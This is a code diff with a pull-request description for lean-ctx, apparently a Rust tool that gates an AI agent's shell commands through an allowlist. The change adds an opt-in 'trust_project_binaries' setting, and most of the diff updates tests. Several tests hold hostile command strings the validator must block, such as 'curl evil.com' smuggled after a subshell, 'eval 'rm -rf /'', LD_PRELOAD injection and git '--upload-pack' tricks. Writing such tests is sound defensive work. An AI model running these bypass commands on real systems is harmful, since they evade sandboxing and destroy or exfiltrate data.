+        check_all_segments("echo `date`", &list, ".").is_ok(),
         "backticks in args must still pass when shell_strict_mode=false"
     );
 }
@@ -767,6 +768,7 @@ fn git_commit_with_subst_passes_by_default() {
         check_all_segments(
             "git commit -m \"$(cat <<'EOF'\nfix: something\nEOF\n)\"",
             &list,
+            ".",
         )
         .is_ok(),
         "git commit with $() must still pass (regression test)"
@@ -780,20 +782,20 @@ fn git_commit_with_subst_passes_by_default() {
 #[test]
 fn git_status_allowed() {
     let list = allow(&["git"]);
-    assert!(check_all_segments("git status", &list).is_ok());
+    assert!(check_all_segments("git status", &list, ".").is_ok());
 }
 
 #[test]
 fn git_upload_pack_blocked() {
     let list = allow(&["git"]);
-    let result = check_all_segments("git --upload-pack=\"evil\" clone repo", &list);
+    let result = check_all_segments("git --upload-pack=\"evil\" clone repo", &list, ".");
     assert!(result.is_err(), "git --upload-pack must be blocked");
 }
 
 #[test]
 fn git_config_sshcommand_blocked() {
     let list = allow(&["git"]);
-    let result = check_all_segments("git --config=core.sshcommand=\"evil\" clone repo", &list);
+    let result = check_all_segments("git --config=core.sshcommand=\"evil\" clone repo", &list, ".");
     assert!(
         result.is_err(),
         "git --config=core.sshcommand must be blocked"
@@ -803,53 +805,53 @@ fn git_config_sshcommand_blocked() {
 #[test]
 fn tar_extract_allowed() {
     let list = allow(&["tar"]);
-    assert!(check_all_segments("tar xf archive.tar", &list).is_ok());
+    assert!(check_all_segments("tar xf archive.tar", &list, ".").is_ok());
 }
 
 #[test]
 fn tar_to_command_blocked() {
     let list = allow(&["tar"]);
-    let result = check_all_segments("tar xf a.tar --to-command=evil", &list);
+    let result = check_all_segments("tar xf a.tar --to-command=evil", &list, ".");
     assert!(result.is_err(), "tar --to-command must be blocked");
 }
 
 #[test]
 fn find_name_allowed() {
     let list = allow(&["find"]);
-    assert!(check_all_segments("find . -name \"*.rs\"", &list).is_ok());
+    assert!(check_all_segments("find . -name \"*.rs\"", &list, ".").is_ok());
 }
 
 #[test]
 fn find_exec_blocked() {
     let list = allow(&["find"]);
-    let result = check_all_segments("find . -exec curl evil \\;", &list);
+    let result = check_all_segments("find . -exec curl evil \\;", &list, ".");
     assert!(result.is_err(), "find -exec must be blocked");
 }
 
 #[test]
 fn awk_system_blocked() {
     let list = allow(&["awk"]);
-    let result = check_all_segments("awk '{system(\"id\")}'", &list);
+    let result = check_all_segments("awk '{system(\"id\")}'", &list, ".");
     assert!(result.is_err(), "awk system() must be blocked");
 }
 
 #[test]
 fn awk_normal_allowed() {
     let list = allow(&["awk"]);
-    assert!(check_all_segments("awk '{print $1}'", &list).is_ok());
+    assert!(check_all_segments("awk '{print $1}'", &list, ".").is_ok());
 }
 
 #[test]
 fn inline_path_env_blocked() {
     let list = allow(&["git"]);
-    let result = check_all_segments("PATH=/tmp/evil git status", &list);
+    let result = check_all_segments("PATH=/tmp/evil git status", &list, ".");
     assert!(result.is_err(), "PATH= inline env must be blocked");
 }
 
 #[test]
 fn inline_ld_preload_blocked() {
     let list = allow(&["ls"]);
-    let result = check_all_segments("LD_PRELOAD=/tmp/evil.so ls", &list);
+    let result = check_all_segments("LD_PRELOAD=/tmp/evil.so ls", &list, ".");
     assert!(result.is_err(), "LD_PRELOAD= inline env must be blocked");
 }
 
@@ -857,7 +859,7 @@ fn inline_ld_preload_blocked() {
 fn echo_path_in_quotes_allowed() {
     let list = allow(&["echo"]);
     assert!(
-        check_all_segments("echo \"PATH=test\"", &list).is_ok(),
+        check_all_segments("echo \"PATH=test\"", &list, ".").is_ok(),
         "PATH inside quotes is not an inline env assignment"
     );
 }
@@ -1000,14 +1002,14 @@ fn extract_base_quoted_path() {
 #[test]
 fn interpreter_check_with_quoted_path() {
     let list = allow(&["python3"]);
-    let r = check_all_segments(r#"python3 "/path/with spaces/script.py""#, &list);
+    let r = check_all_segments(r#"python3 "/path/with spaces/script.py""#, &list, ".");
     assert!(r.is_ok(), "quoted path to script should be allowed");
 }
 
 #[test]
 fn dangerous_flags_git_quoted_path() {
     let list = allow(&["git"]);
-    let r = check_all_segments(r#"git -C "C:\Program Files\repo" status"#, &list);
+    let r = check_all_segments(r#"git -C "C:\Program Files\repo" status"#, &list, ".");
     assert!(r.is_ok(), "git -C with quoted path should be allowed");
 }
 
@@ -1020,50 +1022,50 @@ fn dangerous_flags_git_quoted_path() {
 #[test]
 fn for_loop_with_allowed_body_passes() {
     let list = allow(&["echo"]);
-    assert!(check_all_segments("for i in a b c; do echo $i; done", &list).is_ok());
+    assert!(check_all_segments("for i in a b c; do echo $i; done", &list, ".").is_ok());
 }
 
 #[test]
 fn while_loop_with_allowed_body_passes() {
     let list = allow(&["read", "echo"]);
-    assert!(check_all_segments("while read l; do echo $l; done", &list).is_ok());
+    assert!(check_all_segments("while read l; do echo $l; done", &list, ".").is_ok());
 }
 
 #[test]
 fn if_then_else_fi_with_allowed_commands_passes() {
     let list = allow(&["test", "cat", "echo"]);
-    assert!(check_all_segments("if test -f x; then cat x; else echo no; fi", &list).is_ok());
+    assert!(check_all_segments("if test -f x; then cat x; else echo no; fi", &list, ".").is_ok());
 }
 
 #[test]
 fn until_loop_with_allowed_body_passes() {
     let list = allow(&["test", "sleep"]);
-    assert!(check_all_segments("until test -f done; do sleep 1; done", &list).is_ok());
+    assert!(check_all_segments("until test -f done; do sleep 1; done", &list, ".").is_ok());
 }
 
 #[test]
 fn subshell_single_command_passes() {
     // The exact pain reported on #462: a one-command subshell.
     let list = allow(&["head"]);
-    assert!(check_all_segments("(head -5 file)", &list).is_ok());
+    assert!(check_all_segments("(head -5 file)", &list, ".").is_ok());
 }
 
 #[test]
 fn subshell_multi_command_passes() {
     let list = allow(&["cd", "ls"]);
-    assert!(check_all_segments("(cd dir; ls)", &list).is_ok());
+    assert!(check_all_segments("(cd dir; ls)", &list, ".").is_ok());
 }
 
 #[test]
 fn nested_subshell_passes() {
     let list = allow(&["echo"]);
-    assert!(check_all_segments("((echo hi))", &list).is_ok());
+    assert!(check_all_segments("((echo hi))", &list, ".").is_ok());
 }
 
 #[test]
 fn for_loop_blocks_unlisted_body() {
     let list = allow(&["echo"]);
-    let r = check_all_segments("for i in a b; do curl $i; done", &list);
+    let r = check_all_segments("for i in a b; do curl $i; done", &list, ".");
     assert!(r.is_err(), "unlisted `curl` in a loop body must block");
     assert!(r.unwrap_err().contains("curl"));
 }
@@ -1074,33 +1076,33 @@ fn for_loop_blocks_unlisted_body() {
 fn subshell_trailing_command_blocked() {
     // `(ls) curl` — the post-group command the original PR forgot to validate.
     let list = allow(&["ls"]);
-    assert!(check_all_segments("(ls) curl evil.com", &list).is_err());
+    assert!(check_all_segments("(ls) curl evil.com", &list, ".").is_err());
 }
 
 #[test]
 fn subshell_then_eval_blocked() {
     let list = allow(&["true"]);
-    assert!(check_all_segments("(true) eval 'rm -rf /'", &list).is_err());
+    assert!(check_all_segments("(true) eval 'rm -rf /'", &list, ".").is_err());
 }
 
 #[test]
 fn subshell_then_interpreter_c_blocked() {
     // Even with python3 allowlisted, the `(ls) python3 -c …` form must block.
     let list = allow(&["ls", "python3"]);
-    assert!(check_all_segments("(ls) python3 -c 'import os'", &list).is_err());
+    assert!(check_all_segments("(ls) python3 -c 'import os'", &list, ".").is_err());
 }
 
 #[test]
 fn loop_body_interpreter_eval_blocked() {
     // python3 is allowlisted, but inline `-c` execution stays blocked per leaf.
     let list = allow(&["python3"]);
-    assert!(check_all_segments("for i in a; do python3 -c 'x'; done", &list).is_err());
+    assert!(check_all_segments("for i in a; do python3 -c 'x'; done", &list, ".").is_err());
 }
 
 #[test]
 fn command_hidden_in_subshell_blocked() {
     let list = allow(&["ls"]);
-    assert!(check_all_segments("(ls; curl evil.com)", &list).is_err());
+    assert!(check_all_segments("(ls; curl evil.com)", &list, ".").is_err());
 }
 
 #[test]
@@ -1108,20 +1110,20 @@ fn case_construct_blocked() {
     // `case` arms cannot be leaf-validated safely → blocked outright, even when
     // the arm command itself is allowlisted.
     let list = allow(&["ls"]);
-    assert!(check_all_segments("case $x in a) ls ;; esac", &list).is_err());
+    assert!(check_all_segments("case $x in a) ls ;; esac", &list, ".").is_err());
 }
 
 #[test]
 fn double_semicolon_blocked() {
     let list = allow(&["ls"]);
-    assert!(check_all_segments("ls ;; curl evil.com", &list).is_err());
+    assert!(check_all_segments("ls ;; curl evil.com", &list, ".").is_err());
 }
 
 #[test]
 fn subshell_with_unconditional_blocked_command() {
     // `source` inside a subshell is still unconditionally blocked.
     let list = allow(&["ls", "source"]);
-    assert!(check_all_segments("(ls; source evil.sh)", &list).is_err());
+    assert!(check_all_segments("(ls; source evil.sh)", &list, ".").is_err());
 }
 
 #[test]
@@ -1129,7 +1131,7 @@ fn loop_header_substitution_is_not_a_bypass() {
     // A `$(…)` in a for-header is a command substitution; the leaf walker leaves
     // the header as data, but the body's unlisted command still blocks.
     let list = allow(&["echo"]);
-    assert!(check_all_segments("for i in $(ls); do curl $i; done", &list).is_err());
+    assert!(check_all_segments("for i in $(ls); do curl $i; done", &list, ".").is_err());
 }
 
 // --- Shell-security mode dispatcher (GL #788) ---
@@ -1208,7 +1210,7 @@ fn passes_enforced_is_mode_independent() {
 fn gh760_find_with_lib_path_segment_not_blocked() {
     let list = allow(&["find", "tr"]);
     let cmd = "find target/quarkus-app/lib -name \"*.jar\" | tr '\\n' ':'";
-    let result = check_all_segments(cmd, &list);
+    let result = check_all_segments(cmd, &list, ".");
     assert!(
         result.is_ok(),
         "path segment 'lib' in find args must not be treated as a command: {result:?}"
@@ -1219,7 +1221,7 @@ fn gh760_find_with_lib_path_segment_not_blocked() {
 fn gh760_find_with_deeply_nested_path_not_blocked() {
     let list = allow(&["find", "wc"]);
     let cmd = "find /usr/local/lib/python3/dist-packages -name '*.py' | wc -l";
-    let result = check_all_segments(cmd, &list);
+    let result = check_all_segments(cmd, &list, ".");
     assert!(
         result.is_ok(),
         "path arguments must not be scanned for command names: {result:?}"
@@ -1290,7 +1292,7 @@ fn gh760_pipeline_with_non_allowed_sink_fails() {
 fn compound_block_includes_segment_position() {
     let _lock = crate::core::data_dir::test_env_lock();
     crate::test_env::set_var("LEAN_CTX_SHELL_ALLOWLIST_OVERRIDE", "cp,git,go");
-    let result = super::enforce_shell_allowlist("cp a b && git stash && go build && ./cbc_old");
+    let result = super::enforce_shell_allowlist("cp a b && git stash && go build && ./cbc_old", ".");
     crate::test_env::remove_var("LEAN_CTX_SHELL_ALLOWLIST_OVERRIDE");
     let err = result.unwrap_err().to_string();
     assert!(
@@ -1308,11 +1310,127 @@ fn compound_block_includes_segment_position() {
 fn single_command_block_omits_pipeline_advisory() {
     let _lock = crate::core::data_dir::test_env_lock();
     crate::test_env::set_var("LEAN_CTX_SHELL_ALLOWLIST_OVERRIDE", "git");
-    let result = super::enforce_shell_allowlist("./cbc_old --help");
+    let result = super::enforce_shell_allowlist("./cbc_old --help", ".");
     crate::test_env::remove_var("LEAN_CTX_SHELL_ALLOWLIST_OVERRIDE");
     let err = result.unwrap_err().to_string();
     assert!(
         !err.contains("segment"),
         "single command must not show pipeline info: {err}"
+    );
+}
+
+// --- #813: trust_project_binaries auto-allows project-built executables ---
+
+#[test]
+fn trust_project_binaries_bare_name_never_trusted() {
+    // No `/` in the token → always requires the allowlist, even with the
+    // config on, since resolving a PATH-searched bare name against the
+    // project root would be meaningless.
+    assert!(!is_trusted_project_binary("cbc_old", "."));
+}
+
+#[test]
+fn trust_project_binaries_disabled_by_default() {
+    let _lock = crate::core::data_dir::test_env_lock();
+    let tmp = std::env::temp_dir().join(format!("lean-ctx-813-off-{}", std::process::id()));
+    std::fs::create_dir_all(&tmp).unwrap();
+    std::fs::write(tmp.join("cbc_old"), b"binary").unwrap();
+
+    // No config.toml at all → trust_project_binaries defaults to false.
+    crate::test_env::set_var("LEAN_CTX_CONFIG_DIR", tmp.to_str().unwrap());
+    let trusted = is_trusted_project_binary("./cbc_old", tmp.to_str().unwrap());
+    crate::test_env::remove_var("LEAN_CTX_CONFIG_DIR");
+    std::fs::remove_dir_all(&tmp).ok();
+
+    assert!(!trusted, "trust_project_binaries must default to off");
+}
+
+#[test]
+fn trust_project_binaries_allows_relative_path_under_trusted_build_dir() {
+    let _lock = crate::core::data_dir::test_env_lock();
+    let tmp = std::env::temp_dir().join(format!("lean-ctx-813-on-{}", std::process::id()));
+    std::fs::create_dir_all(&tmp).unwrap();
+    std::fs::write(tmp.join("cbc_old"), b"binary").unwrap();
+    std::fs::write(
+        tmp.join("config.toml"),
+        format!(
+            "trust_project_binaries = true\ntrusted_build_dirs = [\"{}\"]\n",
+            tmp.display()
+        ),
+    )
+    .unwrap();
+
+    crate::test_env::set_var("LEAN_CTX_CONFIG_DIR", tmp.to_str().unwrap());
+    let trusted = is_trusted_project_binary("./cbc_old", tmp.to_str().unwrap());
+    let untrusted_bare = is_trusted_project_binary("cbc_old", tmp.to_str().unwrap());
+    crate::test_env::remove_var("LEAN_CTX_CONFIG_DIR");
+    std::fs::remove_dir_all(&tmp).ok();
+
+    assert!(
+        trusted,
+        "relative path under a trusted_build_dirs entry must be trusted"
+    );
+    assert!(
+        !untrusted_bare,
+        "a bare command name must still require the allowlist"
+    );
+}
+
+#[test]
+fn trust_project_binaries_rejects_path_outside_trusted_dirs() {
+    let _lock = crate::core::data_dir::test_env_lock();
+    let trusted_dir =
+        std::env::temp_dir().join(format!("lean-ctx-813-trusted-{}", std::process::id()));
+    let other_dir =
+        std::env::temp_dir().join(format!("lean-ctx-813-other-{}", std::process::id()));
+    std::fs::create_dir_all(&trusted_dir).unwrap();
+    std::fs::create_dir_all(&other_dir).unwrap();
+    std::fs::write(other_dir.join("evil"), b"binary").unwrap();
+    std::fs::write(
+        trusted_dir.join("config.toml"),
+        format!(
+            "trust_project_binaries = true\ntrusted_build_dirs = [\"{}\"]\n",
+            trusted_dir.display()
+        ),
+    )
+    .unwrap();
+
+    crate::test_env::set_var("LEAN_CTX_CONFIG_DIR", trusted_dir.to_str().unwrap());
+    let trusted = is_trusted_project_binary("./evil", other_dir.to_str().unwrap());
+    crate::test_env::remove_var("LEAN_CTX_CONFIG_DIR");
+    std::fs::remove_dir_all(&trusted_dir).ok();
+    std::fs::remove_dir_all(&other_dir).ok();
+
+    assert!(
+        !trusted,
+        "a binary outside every trusted_build_dirs entry must not be trusted"
+    );
+}
+
+#[test]
+fn check_all_segments_allows_trusted_binary_not_in_allowlist() {
+    let _lock = crate::core::data_dir::test_env_lock();
+    let tmp = std::env::temp_dir().join(format!("lean-ctx-813-e2e-{}", std::process::id()));
+    std::fs::create_dir_all(&tmp).unwrap();
+    std::fs::write(tmp.join("cbc_old"), b"binary").unwrap();
+    std::fs::write(
+        tmp.join("config.toml"),
+        format!(
+            "trust_project_binaries = true\ntrusted_build_dirs = [\"{}\"]\n",
+            tmp.display()
+        ),
+    )
+    .unwrap();
+
+    crate::test_env::set_var("LEAN_CTX_CONFIG_DIR", tmp.to_str().unwrap());
+    let list = allow(&["git"]);
+    let result = check_all_segments("./cbc_old --help", &list, tmp.to_str().unwrap());
+    crate::test_env::remove_var("LEAN_CTX_CONFIG_DIR");
+    std::fs::remove_dir_all(&tmp).ok();
+
+    assert!(
+        result.is_ok(),
+        "trusted project binary must pass check_all_segments even when absent from \
+         shell_allowlist: {result:?}"
     );
 }

--- a/rust/src/tools/registered/ctx_shell.rs
+++ b/rust/src/tools/registered/ctx_shell.rs
@@ -59,13 +59,6 @@ impl McpTool for CtxShellTool {
             });
         }
 
-        if let Err(msg) = crate::core::shell_allowlist::check_shell_allowlist(&command) {
-            return Ok(ToolOutput {
-                shell_outcome: Some(ShellOutcome::Blocked),
-                ..ToolOutput::simple(msg.to_string())
-            });
-        }
-
         warn_shell_secret_paths(&command);
 
         tokio::task::block_in_place(|| {
@@ -83,6 +76,19 @@ impl McpTool for CtxShellTool {
                     None => (explicit_cwd.unwrap_or_else(|| ".".to_string()), None),
                 }
             };
+
+            // Gated here (after cwd resolution, not before) so `trust_project_binaries`
+            // (#813) can resolve a relative binary path (`./cbc_old`) against the
+            // session's tracked cwd, not this process's own launch directory.
+            if let Err(msg) = crate::core::shell_allowlist::check_shell_allowlist_with_cwd(
+                &command,
+                &effective_cwd,
+            ) {
+                return Ok(ToolOutput {
+                    shell_outcome: Some(ShellOutcome::Blocked),
+                    ..ToolOutput::simple(msg.to_string())
+                });
+            }
             // A `cwd` rejected by the project-root jail is silently replaced with
             // the root (deliberate sandboxing). Surface that swap as a one-line
             // hint so the caller does not mistake the run dir for the requested

--- a/rust/src/tools/registered/shell_alias.rs
+++ b/rust/src/tools/registered/shell_alias.rs
@@ -58,14 +58,6 @@ impl McpTool for ShellAliasTool {
         let command = get_str(args, "command")
             .ok_or_else(|| ErrorData::invalid_params("command is required", None))?;
 
-        if let Some(rejection) = crate::tools::ctx_shell::validate_command(&command) {
-            return Ok(ToolOutput::simple(rejection));
-        }
-
-        if let Err(msg) = crate::core::shell_allowlist::check_shell_allowlist(&command) {
-            return Ok(ToolOutput::simple(msg.to_string()));
-        }
-
         tokio::task::block_in_place(|| {
             let cwd = get_str(args, "cwd");
             // Compressed by default (the point of this alias), but honor an explicit


### PR DESCRIPTION
## Summary

Fixes #813. `ctx_shell`'s allowlist blocked A/B-benchmarking binaries built fresh each session (`./cbc_old`, `./cbc_new`), forcing a separate `lean-ctx allow <name>` per throwaway build — as the maintainer's [planned approach](https://github.com/yvgude/lean-ctx/issues/813#issuecomment-4973128395) described.

## Change

- New config keys: `trust_project_binaries` (bool, default `false`) and `trusted_build_dirs` (`Vec<String>`, default `[]`).
- When `trust_project_binaries = true`, a shell segment whose base command is **not** in `shell_allowlist` is still allowed if its first token is an explicit path (`./cbc_old`, `build/cbc_new` — contains `/`) that resolves inside the project root, or inside a `trusted_build_dirs` entry when the list is non-empty. Bare command names (no `/`) are never trusted this way — PATH-searched names still require the allowlist.
- Both keys are **global-config only**, same as `shell_security` — not mergeable from a project-local `.lean-ctx.toml`, so a cloned/untrusted repo can't use its own config to bypass the allowlist for binaries it ships.
- `check_shell_allowlist` gained a `check_shell_allowlist_with_cwd` sibling. MCP `ctx_shell` now runs the allowlist check *after* resolving the session's tracked cwd rather than before, since the trust check needs to resolve relative paths (`./cbc_old`) against the session's virtual cwd (tracked via `cd` inside `ctx_shell`), not the long-lived server process's own launch directory. The CLI shell entrypoints (`-c`/`-t`) and the PreToolUse hook keep using the process-cwd variant, since their process cwd *is* the real invoking directory.
- Removed `shell_alias.rs`'s redundant pre-checks (`validate_command` + `check_shell_allowlist`) — they duplicated (and, for `validate_command`, incorrectly bypassed the `shell_allow_writes_effective` gate for) what `ctx_shell::handle` already does correctly with cwd.
- Regenerated `docs/reference/generated/config-keys.md` via `cargo run --example gen_docs --features dev-tools`.

## Test plan

- [x] `cargo check --lib --tests`
- [x] `cargo clippy --lib --tests -- -D warnings` (clean on all touched files; two pre-existing unrelated warnings elsewhere in the tree are untouched by this diff)
- [x] `cargo test --lib shell_allowlist` — 160 passed, including 5 new tests for `trust_project_binaries`/`trusted_build_dirs` (default-off, bare-name-never-trusted, trusted-dir-allow, outside-trusted-dir-reject, end-to-end via `check_all_segments`)
- [x] `cargo test --lib core::config::` — 253 passed